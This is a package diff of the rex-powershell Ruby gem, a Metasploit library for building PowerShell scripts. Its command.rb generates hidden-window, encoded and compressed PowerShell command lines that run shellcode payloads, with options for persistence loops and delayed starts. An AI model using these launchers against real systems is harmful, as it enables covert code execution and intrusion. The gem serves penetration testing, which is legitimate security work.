rex-powershell 0.1.0

checksums.yaml

@@ -0,0 +1,7 @@
+---
+SHA1:
+  metadata.gz: 6e804aa77f3457dbd23306effacfe287a50a3c18
+  data.tar.gz: a270712dba4ac88432abc0755a14ba92b757820b
+SHA512:
+  metadata.gz: 874849a04f6e9d63adf92c90c2386aafab036ca6589eefe4a86da82bf8b6fd03c79932bf4e89c65f6b52dd2e2162dfcc3db1fb61b84c02843357a6b0bc6c8483
+  data.tar.gz: e4643295020c14d26f18d12eb8a3b1ecf436eb41e2f662c5f703875782a4984ae3b3afa9dffa978ea8173226e61d611a85cacc27cdde31af4bc51a5760aa9eb8

data.tar.gz.sig

@@ -0,0 +1 @@
+.ݞ��=��

data/.gitignore

@@ -0,0 +1,9 @@
+/.bundle/
+/.yardoc
+/Gemfile.lock
+/_yardoc/
+/coverage/
+/doc/
+/pkg/
+/spec/reports/
+/tmp/

data/.rspec

@@ -0,0 +1,2 @@
+--format documentation
+--color

data/.travis.yml

@@ -0,0 +1,5 @@
+sudo: false
+language: ruby
+rvm:
+  - 2.3.1
+before_install: gem install bundler -v 1.12.5

data/CODE_OF_CONDUCT.md

@@ -0,0 +1,52 @@
+# Contributor Code of Conduct
+
+As contributors and maintainers of this project, and in the interest of
+fostering an open and welcoming community, we pledge to respect all people who
+contribute through reporting issues, posting feature requests, updating
+documentation, submitting pull requests or patches, and other activities.
+
+We are committed to making participation in this project a harassment-free
+experience for everyone, regardless of level of experience, gender, gender
+identity and expression, sexual orientation, disability, personal appearance,
+body size, race, ethnicity, age, religion, or nationality.
+
+Examples of unacceptable behavior by participants include:
+
+* The use of sexualized language or imagery
+* Personal attacks
+* Trolling or insulting/derogatory comments
+* Public or private harassment
+* Publishing other's private information, such as physical or electronic
+  addresses, without explicit permission
+* Other unethical or unprofessional conduct
+
+Project maintainers have the right and responsibility to remove, edit, or
+reject comments, commits, code, wiki edits, issues, and other contributions
+that are not aligned to this Code of Conduct, or to ban temporarily or
+permanently any contributor for other behaviors that they deem inappropriate,
+threatening, offensive, or harmful.
+
+By adopting this Code of Conduct, project maintainers commit themselves to
+fairly and consistently applying these principles to every aspect of managing
+this project. Project maintainers who do not follow or enforce the Code of
+Conduct may be permanently removed from the project team.
+
+This Code of Conduct applies both within project spaces and in public spaces
+when an individual is representing the project or its community.
+
+Instances of abusive, harassing, or otherwise unacceptable behavior may be
+reported by contacting the project maintainers at msfdev@metasploit.com. If
+the incident involves a committer, you may report directly to
+egypt@metasploit.com or todb@metasploit.com.
+
+All complaints will be reviewed and investigated and will result in a
+response that is deemed necessary and appropriate to the circumstances.
+Maintainers are obligated to maintain confidentiality with regard to the
+reporter of an incident.
+
+This Code of Conduct is adapted from the [Contributor Covenant][homepage],
+version 1.3.0, available at
+[http://contributor-covenant.org/version/1/3/0/][version]
+
+[homepage]: http://contributor-covenant.org
+[version]: http://contributor-covenant.org/version/1/3/0/

data/Gemfile

@@ -0,0 +1,4 @@
+source 'https://rubygems.org'
+
+# Specify your gem's dependencies in rex-powershell.gemspec
+gemspec

data/LICENSE

@@ -0,0 +1,27 @@
+Copyright (C) 2012-2013, Rapid7, Inc.
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification,
+are permitted provided that the following conditions are met:
+
+    * Redistributions of source code must retain the above copyright notice,
+	  this list of conditions and the following disclaimer.
+
+    * Redistributions in binary form must reproduce the above copyright notice,
+	  this list of conditions and the following disclaimer in the documentation
+	  and/or other materials provided with the distribution.
+
+    * Neither the name of Rapid7 LLC nor the names of its contributors
+	  may be used to endorse or promote products derived from this software
+	  without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
+ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
+ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
+ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
+SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

data/README.md

@@ -0,0 +1,32 @@
+# Rex::Powershell
+
+Ruby Exploitation(Rex) library for dealing with Powershell Scripts. This Library is designed to help create and manipulate powershell scripts for use
+with Metasploit exploits. It is ported over from the Metasploit Framework code originally created by Meatballs1(https://github.com/Meatballs1)
+
+## Installation
+
+Add this line to your application's Gemfile:
+
+```ruby
+gem 'rex-powershell'
+```
+
+And then execute:
+
+    $ bundle
+
+Or install it yourself as:
+
+    $ gem install rex-powershell
+
+
+## Development
+
+After checking out the repo, run `bin/setup` to install dependencies. Then, run `rake spec` to run the tests. You can also run `bin/console` for an interactive prompt that will allow you to experiment.
+
+To install this gem onto your local machine, run `bundle exec rake install`. To release a new version, update the version number in `version.rb`, and then run `bundle exec rake release`, which will create a git tag for the version, push git commits and tags, and push the `.gem` file to [rubygems.org](https://rubygems.org).
+
+## Contributing
+
+Bug reports and pull requests are welcome on GitHub at https://github.com/rapid7/rex-powershell. This project is intended to be a safe, welcoming space for collaboration, and contributors are expected to adhere to the [Contributor Covenant](http://contributor-covenant.org) code of conduct.
+

data/Rakefile

@@ -0,0 +1,6 @@
+require "bundler/gem_tasks"
+require "rspec/core/rake_task"
+
+RSpec::Core::RakeTask.new(:spec)
+
+task :default => :spec

data/bin/console

@@ -0,0 +1,14 @@
+#!/usr/bin/env ruby
+
+require "bundler/setup"
+require "rex/powershell"
+
+# You can add fixtures and/or initialization code here to make experimenting
+# with your gem easier. You can also use a different console, if you like.
+
+# (If you use this, don't forget to add pry to your Gemfile!)
+# require "pry"
+# Pry.start
+
+require "irb"
+IRB.start

data/bin/setup

@@ -0,0 +1,8 @@
+#!/usr/bin/env bash
+set -euo pipefail
+IFS=$'\n\t'
+set -vx
+
+bundle install
+
+# Do any other automated setup that you need to do here

data/lib/rex/powershell.rb

@@ -0,0 +1,71 @@
+# -*- coding: binary -*-
+require 'rex/powershell/version'
+require 'rex/powershell/payload'
+require 'rex/powershell/output'
+require 'rex/powershell/parser'
+require 'rex/powershell/obfu'
+require 'rex/powershell/param'
+require 'rex/powershell/function'
+require 'rex/powershell/script'
+require 'rex/powershell/psh_methods'
+require 'rex/powershell/command'
+
+
+module Rex
+  module Powershell
+    #
+    # Reads script into a Powershell::Script
+    #
+    # @param script_path [String] Path to the Script File
+    #
+    # @return [Script] Powershell Script object
+    def self.read_script(script_path)
+      Rex::Powershell::Script.new(script_path)
+    end
+
+    #
+    # Insert substitutions into the powershell script
+    # If script is a path to a file then read the file
+    # otherwise treat it as the contents of a file
+    #
+    # @param script [String] Script file or path to script
+    # @param subs [Array] Substitutions to insert
+    #
+    # @return [String] Modified script file
+    def self.make_subs(script, subs)
+      if ::File.file?(script)
+        script = ::File.read(script)
+      end
+
+      subs.each do |set|
+        script.gsub!(set[0], set[1])
+      end
+
+      script
+    end
+
+    #
+    # Return an array of substitutions for use in make_subs
+    #
+    # @param subs [String] A ; seperated list of substitutions
+    #
+    # @return [Array] An array of substitutions
+    def self.process_subs(subs)
+      return [] if subs.nil? or subs.empty?
+      new_subs = []
+      subs.split(';').each do |set|
+        new_subs << set.split(',', 2)
+      end
+
+      new_subs
+    end
+
+    #
+    # Converts a raw string to a powershell byte array
+    #
+    def self.to_powershell(str, name = "buf")
+      return Rex::Powershell::Script.to_byte_array(str, name)
+    end
+  end
+end
+

data/lib/rex/powershell/command.rb

@@ -0,0 +1,359 @@
+# -*- coding: binary -*-
+
+module Rex
+module Powershell
+module Command
+  #
+  # Return an encoded powershell script
+  # Will invoke PSH modifiers as enabled
+  #
+  # @param script_in [String] Script contents
+  # @param opts [Hash] The options for encoding
+  # @option opts [Bool] :strip_comments Strip comments
+  # @option opts [Bool] :strip_whitespace Strip whitespace
+  # @option opts [Bool] :sub_vars Substitute variable names
+  # @option opts [Bool] :sub_funcs Substitute function names
+  #
+  # @return [String] Encoded script
+  def self.encode_script(script_in, eof=nil, opts={})
+    # Build script object
+    psh = Rex::Powershell::Script.new(script_in)
+    psh.strip_comments if opts[:strip_comments]
+    psh.strip_whitespace if opts[:strip_whitespace]
+    psh.sub_vars if opts[:sub_vars]
+    psh.sub_funcs if opts[:sub_funcs]
+    psh.encode_code(eof)
+  end
+
+  #
+  # Return a gzip compressed powershell script
+  # Will invoke PSH modifiers as enabled
+  #
+  # @param script_in [String] Script contents
+  # @param eof [String] Marker to indicate the end of file appended to script
+  # @param opts [Hash] The options for encoding
+  # @option opts [Bool] :strip_comments Strip comments
+  # @option opts [Bool] :strip_whitespace Strip whitespace
+  # @option opts [Bool] :sub_vars Substitute variable names
+  # @option opts [Bool] :sub_funcs Substitute function names
+  #
+  # @return [String] Compressed script with decompression stub
+  def self.compress_script(script_in, eof=nil, opts={})
+    # Build script object
+    psh = Rex::Powershell::Script.new(script_in)
+    psh.strip_comments if opts[:strip_comments]
+    psh.strip_whitespace if opts[:strip_whitespace]
+    psh.sub_vars if opts[:sub_vars]
+    psh.sub_funcs if opts[:sub_funcs]
+    psh.compress_code(eof)
+  end
+
+  #
+  # Generate a powershell command line, options are passed on to
+  # generate_psh_args
+  #
+  # @param opts [Hash] The options to generate the command line
+  # @option opts [String] :path Path to the powershell binary
+  # @option opts [Boolean] :no_full_stop Whether powershell binary
+  #   should include .exe
+  #
+  # @return [String] Powershell command line with arguments
+  def self.generate_psh_command_line(opts)
+    if opts[:path] and (opts[:path][-1, 1] != '\\')
+      opts[:path] << '\\'
+    end
+
+    if opts[:no_full_stop]
+      binary = 'powershell'
+    else
+      binary = 'powershell.exe'
+    end
+
+    args = generate_psh_args(opts)
+
+    "#{opts[:path]}#{binary} #{args}"
+  end
+
+  #
+  # Generate arguments for the powershell command
+  # The format will be have no space at the start and have a space
+  # afterwards e.g. "-Arg1 x -Arg -Arg x "
+  #
+  # @param opts [Hash] The options to generate the command line
+  # @option opts [Boolean] :shorten Whether to shorten the powershell
+  #   arguments (v2.0 or greater)
+  # @option opts [String] :encodedcommand Powershell script as an
+  #   encoded command (-EncodedCommand)
+  # @option opts [String] :executionpolicy The execution policy
+  #   (-ExecutionPolicy)
+  # @option opts [String] :inputformat The input format (-InputFormat)
+  # @option opts [String] :file The path to a powershell file (-File)
+  # @option opts [Boolean] :noexit Whether to exit powershell after
+  #   execution (-NoExit)
+  # @option opts [Boolean] :nologo Whether to display the logo (-NoLogo)
+  # @option opts [Boolean] :noninteractive Whether to load a non
+  #   interactive powershell (-NonInteractive)
+  # @option opts [Boolean] :mta Whether to run as Multi-Threaded
+  #   Apartment (-Mta)
+  # @option opts [String] :outputformat The output format
+  #   (-OutputFormat)
+  # @option opts [Boolean] :sta Whether to run as Single-Threaded
+  #   Apartment (-Sta)
+  # @option opts [Boolean] :noprofile Whether to use the current users
+  #   powershell profile (-NoProfile)
+  # @option opts [String] :windowstyle The window style to use
+  #   (-WindowStyle)
+  #
+  # @return [String] Powershell command arguments
+  def self.generate_psh_args(opts)
+    return '' unless opts
+
+    unless opts.key? :shorten
+      opts[:shorten] = (opts[:method] != 'old')
+    end
+
+    arg_string = ' '
+    opts.each_pair do |arg, value|
+      case arg
+        when :encodedcommand
+          arg_string << "-EncodedCommand #{value} " if value
+        when :executionpolicy
+          arg_string << "-ExecutionPolicy #{value} " if value
+        when :inputformat
+          arg_string << "-InputFormat #{value} " if value
+        when :file
+          arg_string << "-File #{value} " if value
+        when :noexit
+          arg_string << '-NoExit ' if value
+        when :nologo
+          arg_string << '-NoLogo ' if value
+        when :noninteractive
+          arg_string << '-NonInteractive ' if value
+        when :mta
+          arg_string << '-Mta ' if value
+        when :outputformat
+          arg_string << "-OutputFormat #{value} " if value
+        when :sta
+          arg_string << '-Sta ' if value
+        when :noprofile
+          arg_string << '-NoProfile ' if value
+        when :windowstyle
+          arg_string << "-WindowStyle #{value} " if  value
+      end
+    end
+
+    # Command must be last (unless from stdin - etc)
+    if opts[:command]
+      arg_string << "-Command #{opts[:command]}"
+    end
+
+    # Shorten arg if PSH 2.0+
+    if opts[:shorten]
+      # Invoke-Command and Out-File require these options to have
+      # an additional space before to prevent Powershell code being
+      # mangled.
+      arg_string.gsub!(' -Command ', ' -c ')
+      arg_string.gsub!('-EncodedCommand ', '-e ')
+      arg_string.gsub!('-ExecutionPolicy ', '-ep ')
+      arg_string.gsub!(' -File ', ' -f ')
+      arg_string.gsub!('-InputFormat ', '-i ')
+      arg_string.gsub!('-NoExit ', '-noe ')
+      arg_string.gsub!('-NoLogo ', '-nol ')
+      arg_string.gsub!('-NoProfile ', '-nop ')
+      arg_string.gsub!('-NonInteractive ', '-noni ')
+      arg_string.gsub!('-OutputFormat ', '-o ')
+      arg_string.gsub!('-Sta ', '-s ')
+      arg_string.gsub!('-WindowStyle ', '-w ')
+    end
+
+    # Strip off first space character
+    arg_string = arg_string[1..-1]
+    # Remove final space character
+    arg_string = arg_string[0..-2] if (arg_string[-1] == ' ')
+
+    arg_string
+  end
+
+  #
+  # Wraps the powershell code to launch a hidden window and
+  # detect the execution environment and spawn the appropriate
+  # powershell executable for the payload architecture.
+  #
+  # @param ps_code [String] Powershell code
+  # @param payload_arch [String] The payload architecture 'x86'/'x86_64'
+  # @param encoded [Boolean] Indicates whether ps_code is encoded or not
+  # @param opts [Hash] The options for generate_psh_args
+  #
+  # @return [String] Wrapped powershell code
+  def self.run_hidden_psh(ps_code, payload_arch, encoded, opts={})
+    opts[:noprofile] ||= 'true'
+    opts[:windowstyle] ||= 'hidden'
+
+    # Old method needs host process to stay open
+    opts[:noexit] = true if (opts[:method] == 'old')
+
+    if encoded
+      opts[:encodedcommand] = ps_code
+    else
+      opts[:command] = ps_code.gsub("'", "''")
+    end
+
+    ps_args = generate_psh_args(opts)
+
+    process_start_info = <<EOS
+$s=New-Object System.Diagnostics.ProcessStartInfo
+$s.FileName=$b
+$s.Arguments='#{ps_args}'
+$s.UseShellExecute=$false
+$s.RedirectStandardOutput=$true
+$s.WindowStyle='Hidden'
+$s.CreateNoWindow=$true
+$p=[System.Diagnostics.Process]::Start($s)
+EOS
+    process_start_info.gsub!("\n", ';')
+
+    archictecure_detection = <<EOS
+if([IntPtr]::Size -eq 4){
+#{payload_arch == 'x86' ? "$b='powershell.exe'" : "$b=$env:windir+'\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe'"}
+}else{
+#{payload_arch == 'x86' ? "$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'" : "$b='powershell.exe'"}
+};
+EOS
+
+    archictecure_detection.gsub!("\n", '')
+
+    archictecure_detection + process_start_info
+  end
+
+  #
+  # Creates a powershell command line string which will execute the
+  # payload in a hidden window in the appropriate execution environment
+  # for the payload architecture. Opts are passed through to
+  # run_hidden_psh, generate_psh_command_line and generate_psh_args
+  #
+  # @param pay [String] The payload shellcode
+  # @param payload_arch [String] The payload architecture 'x86'/'x86_64'
+  # @param opts [Hash] The options to generate the command
+  # @option opts [Boolean] :persist Loop the payload to cause
+  #   re-execution if the shellcode finishes
+  # @option opts [Integer] :prepend_sleep Sleep for the specified time
+  #   before executing the payload
+  # @option opts [String] :method The powershell injection technique to
+  #   use: 'net'/'reflection'/'old'
+  # @option opts [Boolean] :encode_inner_payload Encodes the powershell
+  #   script within the hidden/architecture detection wrapper
+  # @option opts [Boolean] :encode_final_payload Encodes the final
+  #   powershell script
+  # @option opts [Boolean] :remove_comspec Removes the %COMSPEC%
+  #   environment variable at the start of the command line
+  # @option opts [Boolean] :use_single_quotes Wraps the -Command
+  #   argument in single quotes unless :encode_final_payload
+  #
+  # @return [String] Powershell command line with payload
+  def self.cmd_psh_payload(pay, payload_arch, template_path, opts = {})
+    if opts[:encode_inner_payload] && opts[:encode_final_payload]
+      fail RuntimeError, ':encode_inner_payload and :encode_final_payload are incompatible options'
+    end
+
+    if opts[:no_equals] && !opts[:encode_final_payload]
+      fail RuntimeError, ':no_equals requires :encode_final_payload option to be used'
+    end
+
+    psh_payload = case opts[:method]
+                    when 'net'
+                      Rex::Powershell::Payload.to_win32pe_psh_net(template_path, pay)
+                    when 'reflection'
+                      Rex::Powershell::Payload.to_win32pe_psh_reflection(template_path, pay)
+                    when 'old'
+                      Rex::Powershell::Payload.to_win32pe_psh(template_path, pay)
+                    when 'msil'
+                      fail RuntimeError, 'MSIL Powershell method no longer exists'
+                    else
+                      fail RuntimeError, 'No Powershell method specified'
+                  end
+
+    # Run our payload in a while loop
+    if opts[:persist]
+      fun_name = Rex::Text.rand_text_alpha(rand(2) + 2)
+      sleep_time = rand(5) + 5
+      psh_payload  = "function #{fun_name}{#{psh_payload}};"
+      psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};"
+    end
+
+    if opts[:prepend_sleep]
+      if opts[:prepend_sleep].to_i > 0
+        psh_payload = "Start-Sleep -s #{opts[:prepend_sleep]};" << psh_payload
+      end
+    end
+
+    compressed_payload = compress_script(psh_payload, nil, opts)
+    encoded_payload = encode_script(psh_payload, opts)
+
+    # This branch is probably never taken...
+    if encoded_payload.length <= compressed_payload.length
+      smallest_payload = encoded_payload
+      encoded = true
+    else
+      if opts[:encode_inner_payload]
+        encoded = true
+        compressed_encoded_payload = encode_script(compressed_payload)
+
+        if encoded_payload.length <= compressed_encoded_payload.length
+          smallest_payload = encoded_payload
+        else
+          smallest_payload = compressed_encoded_payload
+        end
+      else
+        smallest_payload = compressed_payload
+        encoded = false
+      end
+    end
+
+    # Wrap in hidden runtime / architecture detection
+    inner_args = opts.clone
+    final_payload = run_hidden_psh(smallest_payload, payload_arch, encoded, inner_args)
+
+    command_args = {
+        noprofile: true,
+        windowstyle: 'hidden'
+    }.merge(opts)
+
+    if opts[:encode_final_payload]
+      command_args[:encodedcommand] = encode_script(final_payload)
+
+      # If '=' is a bad character pad the payload until Base64 encoded
+      # payload contains none.
+      if opts[:no_equals]
+        while command_args[:encodedcommand].include? '='
+          final_payload << ' '
+          command_args[:encodedcommand] = encode_script(final_payload)
+        end
+      end
+    else
+      if opts[:use_single_quotes]
+        # Escape Single Quotes
+        final_payload.gsub!("'", "''")
+        # Wrap command in quotes
+        final_payload = "'#{final_payload}'"
+      end
+
+      command_args[:command] = final_payload
+    end
+
+    psh_command = generate_psh_command_line(command_args)
+
+    if opts[:remove_comspec]
+      command = psh_command
+    else
+      command = "%COMSPEC% /b /c start /b /min #{psh_command}"
+    end
+
+    if command.length > 8191
+      fail RuntimeError, 'Powershell command length is greater than the command line maximum (8192 characters)'
+    end
+
+    command
+  end
+end
+end
+end